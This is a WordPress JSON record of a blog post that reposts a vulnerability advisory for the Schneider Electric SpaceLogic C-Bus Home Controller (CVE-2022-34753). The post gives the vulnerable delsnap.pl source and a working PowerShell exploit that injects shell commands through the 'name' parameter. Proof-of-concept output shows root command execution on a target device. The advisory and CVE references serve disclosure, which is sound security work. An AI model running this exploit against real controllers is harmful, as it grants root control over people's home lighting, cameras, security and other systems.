{"id":27350,"date":"2022-07-22T01:28:10","date_gmt":"2022-07-21T21:28:10","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167783\/ZSL-2022-5710.txt"},"modified":"2022-07-22T11:36:02","modified_gmt":"2022-07-22T07:06:02","slug":"schneider-electric-spacelogic-c-bus-home-controller-5200whc2-remote-root","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/schneider-electric-spacelogic-c-bus-home-controller-5200whc2-remote-root\/","title":{"rendered":"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root"},"content":{"rendered":"

<#SpaceLogic.ps1<\/p>\n

Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit<\/p>\n

Vendor: Schneider Electric SE
\nProduct web page: https:\/\/www.se.com
\nhttps:\/\/www.se.com\/ww\/en\/product\/5200WHC2\/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc\/
\nhttps:\/\/www.se.com\/ww\/en\/product-range\/2216-spacelogic-cbus-home-automation-system\/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware
\nAffected version: SpaceLogic C-Bus Home Controller (5200WHC2)
\nformerly known as C-Bus Wiser Home Controller MK2
\nV1.31.460 and prior
\nFirmware: 604<\/p>\n

Summary: SpaceLogic C-Bus Home Automation System
\nLighting control and automation solutions for
\nbuildings of the future, part of SpaceLogic.
\nSpaceLogic C-Bus is a powerful, fully integrated
\nsystem that can control and automate lighting
\nand many other electrical systems and products.
\nThe SpaceLogic C-Bus system is robust, flexible,
\nscalable and has proven solutions for buildings
\nof the future. Implemented for commercial and
\nresidential buildings automation, it brings
\ncontrol, comfort, efficiency and ease of use
\nto its occupants.<\/p>\n

Wiser Home Control makes technologies in your
\nhome easy by providing seamless control of music,
\nhome theatre, lighting, air conditioning, sprinkler
\nsystems, curtains and shutters, security systems…
\nyou name it. Usable anytime, anywhere even when
\nyou are away, via preset shortcuts or direct
\ncontrol, in the same look and feel from a wall
\nswitch, a home computer, or even your smartphone
\nor TV – there is no wiser way to enjoy 24\/7
\nconnectivity, comfort and convenience, entertainment
\nand peace of mind homewide!<\/p>\n

The Wiser 2 Home Controller allows you to access
\nyour C-Bus using a graphical user interface, sometimes
\nreferred to as the Wiser 2 UI. The Wiser 2 Home
\nController arrives with a sample project loaded
\nand the user interface accessible from your local
\nhome network. With certain options set, you can
\nalso access the Wiser 2 UI from anywhere using
\nthe Internet. Using the Wiser 2 Home Controller
\nyou can: control equipment such as IP cameras,
\nC-Bus devices and non C-Bus wired and wireless
\nequipment on the home LAN, schedule events in
\nthe home, create and store scenes on-board, customise
\na C-Bus system using the on-board Logic Engine,
\nmonitor the home environment including C-Bus and
\nsecurity systems, control ZigBee products such
\nas Ulti-ZigBee Dimmer, Relay, Groups and Curtains.<\/p>\n

Examples of equipment you might access with Wiser
\n2 Home Controller include lighting, HVAC, curtains,
\ncameras, sprinkler systems, power monitoring, Ulti-ZigBee,
\nmulti-room audio and security controls.<\/p>\n

Desc: The home automation solution suffers from
\nan authenticated OS command injection vulnerability.
\nThis can be exploited to inject and execute arbitrary
\nshell commands as the root user via the ‘name’ GET
\nparameter in ‘delsnap.pl’ Perl\/CGI script which is
\nused for deleting snapshots taken from the webcam.<\/p>\n

=========================================================
\n\/www\/delsnap.pl:
\n—————-<\/p>\n

01: #!\/usr\/bin\/perl
\n02: use IO::Handle;
\n03:
\n04:
\n05: select(STDERR);
\n06: $| = 1;
\n07: select(STDOUT);
\n08: $| = 1;
\n09:
\n10: #print “\\r\\n\\r\\n”;
\n11:
\n12: $CGITempFile::TMPDIRECTORY = ‘\/mnt\/microsd\/clipsal\/ugen\/imgs\/’;
\n13: use CGI;
\n14:
\n15: my $PROGNAME = “delsnap.pl”;
\n16:
\n17: my $cgi = new CGI();
\n18:
\n19: my $name = $cgi->param(‘name’);
\n20: if ($name eq “list”) {
\n21: print “\\r\\n\\r\\n”;
\n22: print “DATA=”;
\n23: print `ls -C1 \/mnt\/microsd\/clipsal\/ugen\/imgs\/`;
\n24: exit(0);
\n25: }
\n26: if ($name eq “deleteall”) {
\n27: print “\\r\\n\\r\\n”;
\n28: print “DELETINGALL=TRUE&”;
\n29: print `rm \/mnt\/microsd\/clipsal\/ugen\/imgs\/*`;
\n30: print “COMPLETED=true\\n”;
\n31: exit(0);
\n32: }
\n33: #print “name $name\\n”;
\n34: print “\\r\\n\\r\\n”;
\n35: my $filename = “\/mnt\/microsd\/clipsal\/ugen\/imgs\/$name”;
\n36:
\n37: unlink $filename or die “COMPLETED=false\\n”;
\n38:
\n39: print “COMPLETED=true\\n”;<\/p>\n

=========================================================<\/p>\n

Tested on: Machine: OMAP3 Wiser2 Board
\nCPU: ARMv7 revision 2
\nGNU\/Linux 2.6.37 (armv7l)
\nBusyBox v1.22.1
\nthttpd\/2.25b
\nPerl v5.20.0
\nClipsal 81
\nAngstrom 2009.X-stable
\nPICED 4.14.0.100
\nlighttpd\/1.7
\nGCC 4.4.3
\nNodeJS v10.15.3<\/p>\n

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
\n@zeroscience<\/p>\n

Advisory ID: ZSL-2022-5710
\nAdvisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2022-5710.php<\/p>\n

Vendor advisory: https:\/\/download.schneider-electric.com\/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf<\/p>\n

CVE ID: CVE-2022-34753
\nCVE URL: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-34753<\/p>\n

27.03.2022<\/p>\n

#><\/p>\n

$host.UI.RawUI.ForegroundColor = “Green”
\nif ($($args.Count) -ne 2) {
\nWrite-Host(“`nUsage: .\\SpaceLogic.ps1 [IP] [CMD]`n”)
\n} else {
\n$ip = $args[0]\n$cmd = $args[1]\n$cmdinj = “\/delsnap.pl?name=|$cmd”
\nWrite-Host(“`nSending command ‘$cmd’ to $ip`n”)
\n#curl -Headers @{Authorization = “Basic XXXX”} -v $ip$cmdinj
\ncurl -v $ip$cmdinj
\n}<\/p>\n

<#PoC<\/p>\n

PS C:\\> .\\SpaceLogic.ps1<\/p>\n

Usage: .\\SpaceLogic.ps1 [IP] [CMD]\n

PS C:\\> .\\SpaceLogic.ps1 192.168.1.2 “uname -a;id;pwd”<\/p>\n

Sending command ‘uname -a;id;pwd’ to 192.168.1.2<\/p>\n

VERBOSE: GET http:\/\/192.168.1.2\/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload
\nVERBOSE: received 129-byte response of content type text\/html; charset=utf-8<\/p>\n

StatusCode : 200
\nStatusDescription : OK
\nContent : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU\/Linux
\nuid=0(root) gid=0(root)
\n\/custom-package<\/p>\n

RawContent : HTTP\/1.1 200 OK
\nAccess-Control-Allow-Origin: *
\nConnection: keep-alive
\nContent-Length: 129
\nContent-Type: text\/html; charset=utf-8
\nDate: Thu, 30 Jun 2022 14:48:43 GMT
\nETag: W\/”81-LTIWJvYlDBYAlgXEy…
\nForms : {}
\nHeaders : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text\/html;
\ncharset=utf-8]…}
\nImages : {}
\nInputFields : {}
\nLinks : {}
\nParsedHtml : mshtml.HTMLDocumentClass
\nRawContentLength : 129<\/p>\n

PS C:\\>
\n#><\/p>\n","protected":false},"excerpt":{"rendered":"

<#SpaceLogic.ps1 Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit Vendor: Schneider Electric SE Product web page: https:\/\/www.se.com https:\/\/www.se.com\/ww\/en\/product\/5200WHC2\/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc\/ https:\/\/www.se.com\/ww\/en\/product-range\/2216-spacelogic-cbus-home-automation-system\/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware Affected version: SpaceLogic C-Bus Home Controller (5200WHC2) formerly known as C-Bus Wiser Home Controller MK2 V1.31.460 and prior Firmware: 604 Summary: SpaceLogic C-Bus Home Automation System Lighting control and automation solutions for buildings of …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-27350","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27350","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=27350"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27350\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=27350"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=27350"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=27350"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}